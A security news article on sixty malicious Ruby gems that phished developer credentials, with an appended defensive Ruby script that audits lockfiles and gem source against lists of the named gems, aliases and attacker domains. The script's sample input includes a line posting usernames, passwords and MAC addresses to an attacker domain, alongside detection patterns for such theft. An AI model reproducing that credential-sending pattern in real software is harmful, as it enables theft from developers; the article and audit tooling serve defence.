
60 Malicious Ruby Gems Downloaded 275,000 Times Steal Developer Credentials

Sixty malicious Ruby gems containing credential-stealing code have been downloaded more than 275,000 times since March 2023, putting thousands of developer accounts at risk. According to security researchers at Socket, the campaign primarily targeted South Korean developers using automation tools for Instagram, TikTok, Twitter/X, Telegram, Naver, WordPress, and Kakao.

RubyGems, the official package manager for the Ruby programming language, allows developers to share and install libraries—called “gems.” Unfortunately, this same ecosystem has been exploited by cybercriminals to spread malicious packages under multiple aliases, making them harder to detect and remove.

How the Attack Worked

The attackers, using aliases like zon, nowon, kwonsoonje, and soonje, uploaded malicious gems to RubyGems.org over a span of several years. Many of these gems mimicked legitimate automation or SEO tools, a tactic known as typosquatting. Examples include:

  • WordPress-style tools: wp_posting_duo, wp_posting_zon
  • Telegram-style bots: tg_send_duo, tg_send_zon
  • SEO/backlink tools: backlink_zon, back_duo
  • Blog automation: nblog_duo, tblog_zon
  • Naver Café tools: cafe_basics_duo, cafe_buy, cafe_blog_comment

These packages appeared to function normally, complete with a legitimate-looking graphical interface, but secretly acted as phishing tools. Once users entered their credentials, the data—including usernames, passwords, and device MAC addresses—was sent to attacker-controlled servers like programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.

Real-World Impact

Socket reports that some stolen credentials have already surfaced on Russian-speaking darknet markets, confirming that the campaign successfully harvested and sold sensitive data. In some cases, victims received fake login confirmations while no real authentication occurred—masking the breach.

Alarmingly, at least 16 malicious gems remain live on RubyGems.org as of the latest update, despite reports to the RubyGems security team.

A Growing Supply Chain Threat

This is not the first RubyGems supply chain compromise. In June, Socket identified malicious gems impersonating Fastlane, an open-source automation tool for mobile app development, specifically targeting Telegram bot developers.

Developers are urged to take proactive measures:

  • Inspect source code for obfuscated or suspicious segments
  • Check the publisher’s history and reputation
  • Lock dependencies to verified safe versions
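The three measures above can be partly automated. The following Ruby script is an added example, not code from the article or from Socket: it parses a Gemfile.lock, flags any locked gem whose name appears in the article's list of malicious packages, checks a gem's declared authors against the publisher aliases named above, and scans gem source text for the indicators the article describes (hardcoded attacker domains, MAC-address collection, eval of a decoded payload). The gem names, aliases and domains are taken from the article and are not a complete indicator set; the sample lockfile and source snippet are constructed for illustration.

```ruby
# Added example, not code from the article or from Socket: a small audit
# helper for the measures listed above. Gem names, publisher aliases and
# domains come from the article; the sample lockfile and source text are
# constructed for illustration and are not real gem contents.
require 'set'

# Gem names the article identifies as malicious (partial list from the text).
KNOWN_MALICIOUS_GEMS = %w[
  wp_posting_duo wp_posting_zon tg_send_duo tg_send_zon backlink_zon back_duo
  nblog_duo tblog_zon cafe_basics_duo cafe_buy cafe_blog_comment
].to_set.freeze

# Publisher aliases named in the article.
KNOWN_MALICIOUS_AUTHORS = %w[zon nowon kwonsoonje soonje].to_set.freeze

# Attacker-controlled domains named in the article, with the de-fanging
# brackets removed so they match as they would appear in gem source.
KNOWN_C2_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze

# Parse the "specs:" block of a Gemfile.lock into { name => version }.
# Top-level spec lines are indented by exactly four spaces and read
# "name (version)"; deeper-indented lines are dependency constraints.
def parse_lockfile(text)
  gems = {}
  in_specs = false
  text.each_line do |line|
    if line.match?(/\A\s*specs:\s*\z/)
      in_specs = true
      next
    end
    in_specs = false if line.match?(/\A\S/)   # PLATFORMS, DEPENDENCIES, ...
    next unless in_specs
    if (m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/))
      gems[m[1]] = m[2]
    end
  end
  gems
end

# Locked gems whose names are on the known-malicious list.
def flag_known_gems(gems)
  gems.keys.select { |name| KNOWN_MALICIOUS_GEMS.include?(name) }.sort
end

# Publisher check: `authors` is the array from a gem's metadata
# (e.g. Gem::Specification#authors); returns the aliases that match exactly.
def flag_publisher(authors)
  authors.map { |a| a.to_s.strip.downcase }
         .select { |a| KNOWN_MALICIOUS_AUTHORS.include?(a) }
end

# Scan gem source text for the indicators the article describes.
def scan_gem_source(source)
  findings = []
  KNOWN_C2_DOMAINS.each do |domain|
    findings << "contacts known attacker domain #{domain}" if source.include?(domain)
  end
  findings << "collects MAC address" if source.match?(/mac_?address|getmac|ifconfig|ipconfig/i)
  findings << "evals a decoded payload" if source.match?(/eval\s*\(?\s*Base64\.decode64/)
  findings
end

# Combine the lockfile and source checks into one report.
def audit(lock_text, source_text)
  gems = parse_lockfile(lock_text)
  { locked: gems.size,
    flagged_gems: flag_known_gems(gems),
    source_findings: scan_gem_source(source_text) }
end

# Constructed sample lockfile (not a real project's lockfile).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rake (13.0.6)
      wp_posting_duo (0.1.0)
        nokogiri (>= 1.10)
      nokogiri (1.16.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    rake
    wp_posting_duo
LOCK

# Constructed source fragment showing the indicators the article describes
# (hypothetical helper names; this is scan input, not runnable code).
SAMPLE_SOURCE = <<~'SRC'
  # looks like a login form handler, but posts the form to an attacker host
  mac = `getmac`.strip
  post_form("http://programzon.com/collect", user: user, pass: pass, mac: mac)
  show_message("Login successful")   # fake confirmation, no real auth happened
SRC

if __FILE__ == $0
  puts audit(SAMPLE_LOCK, SAMPLE_SOURCE).inspect
end
```

Run it against a real project by replacing SAMPLE_LOCK with `File.read("Gemfile.lock")` and SAMPLE_SOURCE with the contents of files under the installed gem's directory; a name match against a short list is a cheap first filter, and the source scan only catches the unobfuscated patterns named in the article, so treat an empty result as "nothing obvious", not as a clean bill of health.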

Conclusion

The discovery of these 60 malicious Ruby gems underscores the growing supply chain risks in open-source ecosystems. As attacks become more sophisticated, developers must remain vigilant, vetting packages thoroughly before integration to prevent costly security breaches.
